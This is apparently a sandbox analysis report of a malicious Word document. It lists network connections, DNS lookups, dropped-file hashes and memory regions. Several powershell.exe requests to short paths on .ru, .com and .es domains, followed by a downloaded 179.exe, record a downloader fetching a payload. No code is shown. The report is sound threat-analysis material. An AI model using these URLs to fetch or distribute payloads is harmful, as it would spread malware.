    X-Office-AudienceGroup: Production
    X-Office-SessionId: 32C569C1-D90A-4510-8C0B-6BD4835AC58B
    Host: binaries.templates.cdn.office.net
    Response
    HTTP/1.1 200 OK
    Content-Length: 953453
    Content-Type: application/vnd.ms-cab-compressed
    Content-MD5: 1OrACenntkuLABroK4EC+g==
    Last-Modified: Thu, 12 Jul 2018 00:20:10 GMT
    ETag: 0x8D5E78D3A9D8C97
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: faf4e13b-801e-0036-5697-a0075a000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Sun, 26 May 2024 21:49:25 GMT
    Connection: keep-alive
    Access-Control-Allow-Headers: *
    Vary: Origin
    Access-Control-Allow-Credentials: true
    Access-Control-Allow-Methods: GET,POST,OPTIONS
    Access-Control-Allow-Origin: *
  • flag-us
    DNS
    184.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    184.61.62.23.in-addr.arpa
    IN PTR
    Response
    184.61.62.23.in-addr.arpa
    IN PTR
    a23-62-61-184deploystaticakamaitechnologiescom
  • flag-us
    DNS
    184.61.62.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    184.61.62.23.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    17.251.17.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.251.17.2.in-addr.arpa
    IN PTR
    Response
    17.251.17.2.in-addr.arpa
    IN PTR
    a2-17-251-17deploystaticakamaitechnologiescom
  • flag-us
    DNS
    157.123.68.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    157.123.68.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    23.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.236.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.89.19:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    WINWORD.EXE
    1.7kB
    7.7kB
    11
    10

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 45.130.41.103:80
    http://anapapoliv.ru/Sp4na
    http
    powershell.exe
    942 B
    39.3kB
    19
    32

    HTTP Request

    GET http://anapapoliv.ru/Sp4na

    HTTP Response

    200
  • 208.115.219.174:80
    http://shorecrestschools.com/nnQkN
    http
    powershell.exe
    306 B
    595 B
    5
    3

    HTTP Request

    GET http://shorecrestschools.com/nnQkN

    HTTP Response

    302
  • 208.115.219.174:443
    https://shorecrestschools.com/nnQkN
    tls, http
    powershell.exe
    737 B
    4.4kB
    8
    7

    HTTP Request

    GET https://shorecrestschools.com/nnQkN

    HTTP Response

    404
  • 37.153.95.99:80
    http://comicole.com/2HZ
    http
    powershell.exe
    295 B
    648 B
    5
    3

    HTTP Request

    GET http://comicole.com/2HZ

    HTTP Response

    404
  • 134.0.9.152:80
    http://elartedelaaccion.es/6Hyl
    http
    powershell.exe
    303 B
    523 B
    5
    3

    HTTP Request

    GET http://elartedelaaccion.es/6Hyl

    HTTP Response

    301
  • 134.0.9.152:443
    https://elartedelaaccion.es/6Hyl
    tls, http
    powershell.exe
    1.6kB
    54.9kB
    26
    45

    HTTP Request

    GET https://elartedelaaccion.es/6Hyl

    HTTP Response

    404
  • 23.62.61.184:443
    https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
    tls, http
    WINWORD.EXE
    1.2kB
    5.9kB
    8
    8

    HTTP Request

    GET https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab
    tls, http
    WINWORD.EXE
    108.6kB
    3.6MB
    1866
    2553

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328884.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998159.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
    tls, http
    WINWORD.EXE
    2.6kB
    50.1kB
    33
    42

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
    tls, http
    WINWORD.EXE
    2.2kB
    41.3kB
    29
    37

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
    tls, http
    WINWORD.EXE
    2.0kB
    53.0kB
    26
    44

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab
    tls, http
    WINWORD.EXE
    26.1kB
    759.1kB
    429
    553

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851218.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391701.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
    tls, http
    WINWORD.EXE
    1.9kB
    39.8kB
    24
    35

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab
    tls, http
    WINWORD.EXE
    2.1kB
    37.6kB
    26
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851219.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab
    tls, http
    WINWORD.EXE
    1.9kB
    37.5kB
    23
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851220.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab
    tls, http
    WINWORD.EXE
    2.4kB
    39.0kB
    30
    34

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851221.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab
    tls, http
    WINWORD.EXE
    2.0kB
    34.9kB
    25
    31

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851222.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab
    tls, http
    WINWORD.EXE
    2.3kB
    37.0kB
    29
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851224.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab
    tls, http
    WINWORD.EXE
    2.2kB
    37.1kB
    29
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851225.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab
    tls, http
    WINWORD.EXE
    2.5kB
    41.7kB
    31
    36

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851226.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab
    tls, http
    WINWORD.EXE
    2.0kB
    37.5kB
    25
    33

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851227.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab
    tls, http
    WINWORD.EXE
    11.4kB
    323.6kB
    188
    238

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043001.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab
    tls, http
    WINWORD.EXE
    2.5kB
    38.9kB
    31
    34

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851223.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab
    tls, http
    WINWORD.EXE
    31.0kB
    751.4kB
    481
    545

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0309043402.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
    tls, http
    WINWORD.EXE
    2.0kB
    27.4kB
    24
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab
    tls, http
    WINWORD.EXE
    2.0kB
    26.2kB
    24
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328905.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab
    tls, http
    WINWORD.EXE
    2.7kB
    37.1kB
    32
    32

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328908.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab
    tls, http
    WINWORD.EXE
    2.2kB
    32.9kB
    27
    30

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328916.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab
    tls, http
    WINWORD.EXE
    2.1kB
    27.9kB
    24
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328919.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab
    tls, http
    WINWORD.EXE
    62.6kB
    2.0MB
    1112
    1429

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328925.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392101.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab
    tls, http
    WINWORD.EXE
    44.7kB
    1.2MB
    734
    842

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328932.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403391901.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab
    tls, http
    WINWORD.EXE
    1.6kB
    29.4kB
    17
    27

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328935.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab
    tls, http
    WINWORD.EXE
    8.7kB
    269.3kB
    139
    201

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328940.cab

    HTTP Response

    200

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111502.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab
    tls, http
    WINWORD.EXE
    2.2kB
    25.9kB
    19
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328951.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab
    tls, http
    WINWORD.EXE
    1.6kB
    26.8kB
    17
    25

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328972.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab
    tls, http
    WINWORD.EXE
    1.6kB
    28.4kB
    17
    27

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328975.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab
    tls, http
    WINWORD.EXE
    1.6kB
    28.5kB
    18
    27

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328983.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab
    tls, http
    WINWORD.EXE
    1.6kB
    28.1kB
    17
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328986.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab
    tls, http
    WINWORD.EXE
    1.6kB
    25.0kB
    18
    24

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328990.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab
    tls, http
    WINWORD.EXE
    1.7kB
    27.1kB
    19
    26

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328998.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab
    tls, http
    WINWORD.EXE
    12.8kB
    310.0kB
    202
    228

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345744402.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab
    tls, http
    WINWORD.EXE
    10.9kB
    290.5kB
    184
    215

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345746401.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab
    tls, http
    WINWORD.EXE
    10.4kB
    284.9kB
    179
    210

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345747501.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab
    tls, http
    WINWORD.EXE
    10.2kB
    274.6kB
    182
    203

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749101.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab
    tls, http
    WINWORD.EXE
    88.3kB
    2.7MB
    1531
    1927

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345748501.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab
    tls, http
    WINWORD.EXE
    19.7kB
    573.5kB
    342
    418

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345749601.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
    tls, http
    WINWORD.EXE
    26.9kB
    666.1kB
    428
    484

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
    tls, http
    WINWORD.EXE
    7.2kB
    235.2kB
    118
    175

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
    tls, http
    WINWORD.EXE
    37.8kB
    1.1MB
    690
    801

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
    tls, http
    WINWORD.EXE
    2.5kB
    49.6kB
    27
    43

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab
    tls, http
    WINWORD.EXE
    38.7kB
    1.4MB
    684
    984

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392501.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
    tls, http
    WINWORD.EXE
    89.9kB
    2.6MB
    1425
    1884

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab
    tls, http
    WINWORD.EXE
    42.2kB
    1.8MB
    819
    1319

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392901.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab
    tls, http
    WINWORD.EXE
    125.3kB
    3.4MB
    1980
    2427

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403393701.cab

    HTTP Response

    200
  • 2.17.251.17:443
    https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab
    tls, http
    WINWORD.EXE
    17.7kB
    988.9kB
    367
    717

    HTTP Request

    GET https://binaries.templates.cdn.office.net/support/templates/en-us/tp1000111403.cab

    HTTP Response

    200
  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    WINWORD.EXE
    73 B
    247 B
    1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.89.19

  • 8.8.8.8:53
    46.28.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    46.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    19.89.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    19.89.109.52.in-addr.arpa

  • 8.8.8.8:53
    18.24.18.2.in-addr.arpa
    dns
    69 B
    131 B
    1
    1

    DNS Request

    18.24.18.2.in-addr.arpa

  • 8.8.8.8:53
    138.32.126.40.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    138.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    baza-shartash.ru
    dns
    powershell.exe
    62 B
    123 B
    1
    1

    DNS Request

    baza-shartash.ru

  • 8.8.8.8:53
    anapapoliv.ru
    dns
    powershell.exe
    59 B
    75 B
    1
    1

    DNS Request

    anapapoliv.ru

    DNS Response

    45.130.41.103

  • 8.8.8.8:53
    shorecrestschools.com
    dns
    powershell.exe
    67 B
    83 B
    1
    1

    DNS Request

    shorecrestschools.com

    DNS Response

    208.115.219.174

  • 8.8.8.8:53
    103.41.130.45.in-addr.arpa
    dns
    72 B
    106 B
    1
    1

    DNS Request

    103.41.130.45.in-addr.arpa

  • 8.8.8.8:53
    comicole.com
    dns
    powershell.exe
    58 B
    74 B
    1
    1

    DNS Request

    comicole.com

    DNS Response

    37.153.95.99

  • 8.8.8.8:53
    elartedelaaccion.es
    dns
    powershell.exe
    65 B
    81 B
    1
    1

    DNS Request

    elartedelaaccion.es

    DNS Response

    134.0.9.152

  • 8.8.8.8:53
    174.219.115.208.in-addr.arpa
    dns
    74 B
    127 B
    1
    1

    DNS Request

    174.219.115.208.in-addr.arpa

  • 8.8.8.8:53
    99.95.153.37.in-addr.arpa
    dns
    71 B
    105 B
    1
    1

    DNS Request

    99.95.153.37.in-addr.arpa

  • 8.8.8.8:53
    152.9.0.134.in-addr.arpa
    dns
    70 B
    100 B
    1
    1

    DNS Request

    152.9.0.134.in-addr.arpa

  • 8.8.8.8:53
    3.173.189.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    3.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    metadata.templates.cdn.office.net
    dns
    WINWORD.EXE
    79 B
    231 B
    1
    1

    DNS Request

    metadata.templates.cdn.office.net

    DNS Response

    23.62.61.184
    23.62.61.162

  • 8.8.8.8:53
    binaries.templates.cdn.office.net
    dns
    WINWORD.EXE
    79 B
    202 B
    1
    1

    DNS Request

    binaries.templates.cdn.office.net

    DNS Response

    2.17.251.17
    2.17.251.23

  • 8.8.8.8:53
    184.61.62.23.in-addr.arpa
    dns
    142 B
    135 B
    2
    1

    DNS Request

    184.61.62.23.in-addr.arpa

    DNS Request

    184.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    17.251.17.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    17.251.17.2.in-addr.arpa

  • 8.8.8.8:53
    157.123.68.40.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    157.123.68.40.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    23.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    23.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\179.exe

    Filesize

    36KB

    MD5

    41d9f8321bbd35aaf891f3b7bac060df

    SHA1

    58da7c06501159f4c7b909d59abc23152e8372ad

    SHA256

    29457444b7268825b17399a00ce19fcd9ecd6647b936f229c8ca2bb35ea4ca64

    SHA512

    5a23e2e3bd6713d0a66eb8ca74ac5ae878c549e20eb1d18423d7afa739d431685ebe0f66a8bf730c7b8188baaaedebe321294269de3e35e6b91bd07189803960

  • C:\Users\Admin\AppData\Local\Temp\TCD7C8F.tmp\iso690.xsl

    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujt1qjdf.ib3.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3160-10-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-52-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-5-0x00007FFAC3A8D000-0x00007FFAC3A8E000-memory.dmp

    Filesize

    4KB

  • memory/3160-7-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-8-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-54-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-11-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-0-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3160-9-0x00007FFA81680000-0x00007FFA81690000-memory.dmp

    Filesize

    64KB

  • memory/3160-14-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-15-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-16-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-17-0x00007FFA81680000-0x00007FFA81690000-memory.dmp

    Filesize

    64KB

  • memory/3160-13-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-12-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-48-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-45-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-51-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-4-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3160-53-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-6-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-50-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-49-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-37-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-589-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-1-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3160-3-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3160-2-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3160-562-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-563-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-564-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-565-0x00007FFAC39F0000-0x00007FFAC3BE5000-memory.dmp

    Filesize

    2.0MB

  • memory/3160-585-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3160-588-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3160-587-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3160-586-0x00007FFA83A70000-0x00007FFA83A80000-memory.dmp

    Filesize

    64KB

  • memory/3436-63-0x0000023A4BEF0000-0x0000023A4BF12000-memory.dmp

    Filesize

    136KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.